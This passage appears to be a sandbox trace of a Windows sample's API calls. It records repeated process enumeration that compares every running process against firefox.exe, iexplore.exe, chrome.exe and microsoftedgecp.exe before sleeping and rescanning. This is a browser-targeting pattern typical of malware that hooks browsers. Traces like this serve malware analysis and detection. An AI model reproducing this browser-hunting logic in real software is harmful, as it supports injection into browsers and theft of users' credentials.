szExeFile="spoolsv.exe")) returned 1 [0199.999] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0199.999] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0199.999] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0199.999] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0199.999] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0200.000] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0200.000] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0200.000] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0200.000] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0200.000] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.000] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0200.000] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0200.000] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0200.000] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0200.000] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0200.001] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0200.001] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0200.001] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0200.001] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0200.001] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0200.001] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0200.001] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0200.001] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0200.001] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0200.002] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0200.002] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0200.002] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0200.002] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0200.002] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0200.002] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0200.003] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0200.003] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0200.003] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0200.003] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0200.003] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0200.003] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0200.003] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0200.003] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0200.003] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0200.003] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0200.004] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0200.004] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0200.004] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0200.004] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0200.004] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0200.005] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0200.005] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0200.005] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0200.005] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0200.005] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0200.005] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0200.005] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0200.005] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0200.005] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0200.005] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0200.006] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0200.006] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0200.006] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0200.006] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0200.006] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0200.006] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0200.006] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0200.006] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0200.006] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0200.006] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0200.007] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0200.007] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0200.007] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0200.007] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0200.007] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0200.007] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0200.008] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0200.008] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0200.008] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0200.008] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0200.010] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0200.010] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0200.010] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0200.010] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0200.010] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0200.010] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0200.010] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0200.011] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0200.011] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0200.011] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0200.011] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0200.011] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0200.011] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0200.011] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0200.011] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0200.012] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0200.012] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0200.012] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0200.012] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0200.012] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0200.012] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0200.012] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0200.012] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0200.012] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0200.012] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0200.013] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0200.013] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0200.013] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0200.013] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0200.013] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0200.013] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0200.013] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0200.013] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0200.013] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0200.013] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0200.014] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0200.014] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0200.014] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0200.014] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0200.014] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0200.014] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0200.014] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0200.015] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0200.015] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0200.015] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0200.015] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0200.015] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0200.015] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0200.015] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0200.015] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0200.016] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0200.016] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0200.016] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0200.016] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0200.016] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.016] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0200.016] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0200.016] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0200.016] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0200.016] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0200.017] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0200.017] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0200.017] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0200.017] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0200.017] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.017] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0200.017] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0200.017] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0200.018] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0200.018] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0200.018] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0200.018] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0200.018] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0200.018] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0200.018] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.019] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0200.019] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0200.019] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0200.019] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0200.019] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0200.019] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0200.019] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0200.019] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0200.019] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0200.019] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0200.020] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0200.020] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0200.020] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0200.020] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0200.020] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0200.020] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0200.020] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0200.020] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0200.020] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0200.020] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0200.021] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0200.021] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0200.021] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0200.021] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0200.021] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0200.021] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0200.021] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0200.021] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0200.021] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0200.021] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0200.063] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0200.063] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0200.063] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0200.063] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0200.063] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0200.064] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0200.064] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0200.064] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0200.064] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0200.064] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0200.064] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0200.064] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0200.064] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0200.064] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0200.064] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0200.065] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="firefox.exe") returned 1 [0200.065] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="iexplore.exe") returned 1 [0200.065] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="chrome.exe") returned 1 [0200.065] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="microsoftedgecp.exe") returned 1 [0200.065] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 0 [0200.065] CloseHandle (hObject=0xd4) returned 1 [0200.066] Sleep (dwMilliseconds=0x3e8) [0201.077] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 